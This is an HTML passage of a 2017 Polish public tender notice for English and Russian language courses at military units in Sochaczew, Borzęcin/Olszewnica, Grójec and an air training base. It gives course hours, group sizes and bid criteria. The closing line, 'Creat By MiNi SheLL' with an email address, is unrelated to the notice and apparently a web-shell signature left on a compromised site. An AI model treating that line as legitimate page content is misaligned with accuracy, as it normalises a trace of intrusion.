                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Doświadczenie i kwalifikacje zawodowo-specjalistyczne lektorów oraz metodyków przewidzianych do realizacji zamówienia </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Strony dopuszczają możliwość nieistotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w formie aneksu z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany. 2. Zamawiający przewiduje możliwość dokonania nieistotnych zmian, w przypadku przekształceń podmiotowych po stronie Wykonawcy skutkujących następstwem prawnym, a także w przypadku zmiany adresu, nazwy Wykonawcy lub Zamawiającego, dopuszcza się zmiany w tym zakresie.3. Zamawiający zastrzega sobie prawo zmiany sposobu wykonania przedmiotu zamówienia z powodu: 1) uzasadnionych zmian, których nie można było wcześniej przewidzieć; 2) z powodu okoliczności siły wyższej.
a) jako siłę wyższą należy rozumieć zdarzenie nagłe, poza kontrolą zarówno Zamawiającego, jak i Wykonawcy, gdy w chwili zawarcia umowy niemożliwe było przewidzenie tego zdarzenia i jego skutków, które wpłynęły na zdolność Strony do wykonania umowy, oraz gdy niemożliwe było uniknięcie samego zdarzenia lub przynajmniej jego skutków; b) za siłę wyższą nie uznaje się między innymi: brak środków u Wykonawcy, czy niedotrzymanie zobowiązań przez jego kontrahentów lub podwykonawców; c) Strony umowy zobowiązują się do wzajemnego powiadamiania o zaistnieniu siły wyższej i dokonania stosownych ustaleń celem wyeliminowania możliwych skutków działania siły wyższej. Powiadomienia, o którym mowa należy dokonać pisemnie lub w inny dostępny sposób, niezwłocznie po fakcie wystąpienia siły wyższej. Do powiadomienia należy dołączyć dowody na poparcie zaistnienia siły wyższej; d) nie można powoływać się na siłę wyższą w przypadku braku zawiadomienia zarówno o zaistnieniu jak i o ustaniu okoliczności siły wyższej, jak również nie przedstawienia dowodów, o których mowa w ppkt c). 4. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu oraz określił warunki takiej zmiany (art.144 ust.1-1b, 1d i 1 e ustawy Pzp).5. Zmiana umowy dokonana z  naruszeniem ww.punktu podlega unieważnieniu.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/01/2017, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Ofertę należy złożyć pod rygorem nieważności w formie pisemnej w języku polskim.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Przeprowadzenie kursu języka angielskiego dla JW 3939 Sochaczew w 2017 roku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Kształcenie odbędzie się w następujących grupach szkoleniowych:
1) grupa I  na poziomie pierwszym podstawowym (kurs stacjonarny)  590 godzin dydaktycznych; w terminie: od  06.02.2017 r. do 28.06.2017 r.; ilość słuchaczy: od 5 do 14 osób; 
2) grupa II  na poziomie drugim uzupełniającym   240 godzin dydaktycznych; w terminie: od  04.09.2017 r. do 27.10.2017 r.; ilość słuchaczy: od 5 do 12 osób;
3) grupa III  na poziomie pierwszym  doskonalącym  120 godzin dydaktycznych;w terminie: od 12.06.2017 r. do 07.07.2017 r.; ilość słuchaczy od 5 do 14 osób.
Zajęcia będą się odbywały przez 5 (pięć) dni w tygodniu (od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy) w następującym wymiarze zgodnie z porządkiem dnia Jednostki Wojskowej 3939:
1) dla grupy I - od godz. 8:00  13:30  6 (w razie potrzeby 7) godzin lekcyjnych  (6  lub 7 x 45 min.);
2) dla grupy II - od godz. 8:00  13:30  6 godzin lekcyjnych  (6x 45 min.);
3) dla grupy III - od godz. 8:00  13:30  6 godzin lekcyjnych  (6x 45 min.).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98300000-6, 80000000-4,
                    80580000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 27/10/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie i kwalifikacje zawodowo-specjalistyczne lektorów oraz metodyków przewidzianych do realizacji zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Przeprowadzenie kursu języka angielskiego dla JW 3934 Olszewnica/Borzęcin w 2017 roku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Kształcenie odbędzie się w następujących grupach szkoleniowych:
1) grupa I  na poziomie pierwszym podstawowym (kurs stacjonarny)	   590 godzin dydaktycznych; w terminie: od 06.02.2017 r. do 28.06.2017 r.; ilość słuchaczy: od 5 do 14 osób;Miejsce: Borzęcin;
2) grupa II  na poziomie pierwszym podstawowym (kurs stacjonarny)   590 godzin dydaktycznych w terminie: od 04.09.2017 r. do 26.01.2018 r. ilość słuchaczy: od 5 do 14 osób; Miejsce: Borzęcin;
3) grupa III na poziomie drugim średniozaawansowanym (kurs stacjonarny)  590 godzin dydaktycznych; w terminie: od 04.09.2017 r. do 31.01.2018 r. ilość słuchaczy: od 5 do 12 osób; Miejsce: Olszewnica;
4) grupa IV na poziomie pierwszym uzupełniającym  - 240 godzin dydaktycznych w terminie: od 04.09.2017 r. do 27.10.2017 r. ilość słuchaczy: od 5 do 14 osób; Miejsce: Borzęcin;
5) grupa V na poziomie drugim  uzupełniającym  - 240 godzin dydaktycznych 
w terminie: od 04.09.2017 r. do 03.11.2017 r. ilość słuchaczy: od 5 do 12 osób; Miejsce: Olszewnica;
Zajęcia będą się odbywały przez 5 (pięć) dni w tygodniu (od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy) w godzinach: 8.00  13.30. Zajęcia będą prowadzone w wymiarze 6 (w razie potrzeby 7) godzin lekcyjnych dziennie, od poniedziałku do piątku zgodnie z porządkiem dnia Jednostki Wojskowej 3934 Olszewnica/ Borzęcin.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98300000-6, 80000000-4,
                    80580000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/01/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie i kwalifikacje zawodowo-specjalistyczne lektorów oraz metodyków przewidzianych do realizacji zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Przeprowadzenie kursu języka angielskiego dla JW 1560 Sochaczew w 2017 roku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Kształcenie odbędzie się w następujących grupach szkoleniowych:
1) grupa I  na poziomie pierwszym podstawowym (kurs stacjonarny)  590 godzin dydaktycznych; w terminie: od  04.09.2017 r. do 26.01.2018 r.; ilość słuchaczy: od 5 do 14 osób;
2) grupa II  na poziomie pierwszym uzupełniającym  240 godzin dydaktycznych; w terminie: od  06.02.2017 r. do 31.03.2017 r.; ilość słuchaczy: od 5 do 14 osób;
3) grupa III  na poziomie drugim uzupełniającym  240 godzin dydaktycznych;w terminie: od  13.02.2017 r. do 07.04.2017 r.; ilość słuchaczy: od 5 do 12 osób;
4) grupa IV kurs specjalistyczny terminologii wojskowej dla plutonów GROM 
 120 godzin dydaktycznych; w terminie od  13.11.2017 r. do 08.12.2017 r.; ilość słuchaczy: od 5 do 14 osób;
Zajęcia będą się odbywały przez 5 (pięć) dni w tygodniu (od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy): w godzinach: 8:00  13:30  6 (w razie potrzeby 7) godzin lekcyjnych - (6 lub 7 x  45 min.) zgodnie z porządkiem dnia Jednostki Wojskowej 1560 Sochaczew.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98300000-6, 80000000-4,
                    80580000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 26/01/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie i kwalifikacje zawodowo-specjalistyczne lektorów oraz metodyków przewidzianych do realizacji zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Przeprowadzenie kursu języka angielskiego dla JW 3688 Sochaczew w 2017 roku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Kształcenie odbędzie się w następujących grupach szkoleniowych:
1) grupa I  na poziomie trzecim wyrównawczo - doskonalącym  240 godzin dydaktycznych; w terminie: od  06.02.2017 r. do 05.07.2017 r.; ilość słuchaczy: od 5 do 15 osób;
2) grupa II na poziomie drugim doskonalącym  120 godzin dydaktycznych; 
w terminie: od  06.11.2017 r. do 01.12.2017 r.; ilość słuchaczy: od 5 do 14 osób;
Zajęcia podczas kursów będą się odbywały: 
1) dla grupy I - przez 4 (cztery) dni w tygodniu (od poniedziałku do czwartku z wyłączeniem dni ustawowo wolnych od pracy) w godzinach: 10.45  13.15  tj. po 3 (trzy) godziny lekcyjne każdego dnia (3 x 45 min) zgodnie z porządkiem dnia Jednostki Wojskowej 3688 Sochaczew.
2) dla grupy II  przez 5 (pięć) dni w tygodniu (od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy) w godzinach: 8.00  13.15  po 6 (sześć) godzin lekcyjnych każdego dnia (6 x 45 min) zgodnie z porządkiem dnia Jednostki Wojskowej 3688.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98300000-6, 80000000-4,
                    80580000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 01/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie i kwalifikacje zawodowo-specjalistyczne lektorów oraz metodyków przewidzianych do realizacji zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Przeprowadzenie kursu języka angielskiego dla 42. Bazy Lotnictwa Szkolnego w 2017 roku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Kształcenie odbędzie się w następujących grupach szkoleniowych:
1) grupa I  na poziomie pierwszym uzupełniającym  240 godzin dydaktycznych; w terminie: od  06.02.2017 r. do 31.03.2017 r.; ilość słuchaczy: od 5 do 14 osób;
2) grupa II  na poziomie pierwszym podstawowym (kurs stacjonarny)  590 godzin dydaktycznych; w terminie: od  04.09.2017 r. do 26.01.2018 r.; ilość słuchaczy: od 5 do 14 osób;
Zajęcia będą się odbywały przez 5 (pięć) dni w tygodniu (od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy) zgodnie z porządkiem dnia 42. Bazy Lotnictwa Szkolnego.
1) dla grupy I  w godzinach: 8:00  13:30  6 godzin lekcyjnych (6 x 45 min.);
2) dla grupy II  w godzinach: 8:00  14:00  6  lub 7 godzin lekcyjnych (6 lub 7 x 45 min);<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98300000-6, 80000000-4,
                    80580000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 26/01/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie i kwalifikacje zawodowo-specjalistyczne lektorów oraz metodyków przewidzianych do realizacji zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Przeprowadzenie kursu języka rosyjskiego dla JW 34 11 Grójec w 2017 roku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Kształcenie odbędzie się w następujących grupach szkoleniowych:
1) grupa I  na poziomie pierwszym podstawowym (kurs stacjonarny)  590 godzin dydaktycznych; w terminie: od  07.02.2017 r. do 28.06.2017 r.; ilość słuchaczy: od 10 do 15 osób; 
2) grupa II  na poziomie pierwszym uzupełniającym   240 godzin dydaktycznych; w terminie: od  22.11.2017 r. do 26.01.2018 r.; ilość słuchaczy: od 10 do 15 osób;
Zajęcia będą się odbywały przez 5 (pięć) dni w tygodniu (od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy) w godz. od 8:00 do 14:00 (poniedziałek  czwartek z wyłączeniem dni ustawowo wolnych od pracy; 6 lub 7 x 45 min.) oraz w godz. 8:00  13:05 (piątek; 6 godz. lekcyjnych), zgodnie z porządkiem dnia Jednostki Wojskowej 3411 Grójec<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98300000-6, 80000000-4,
                    80580000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 26/01/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie i kwalifikacje zawodowo-specjalistyczne lektorów oraz metodyków przewidzianych do realizacji zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com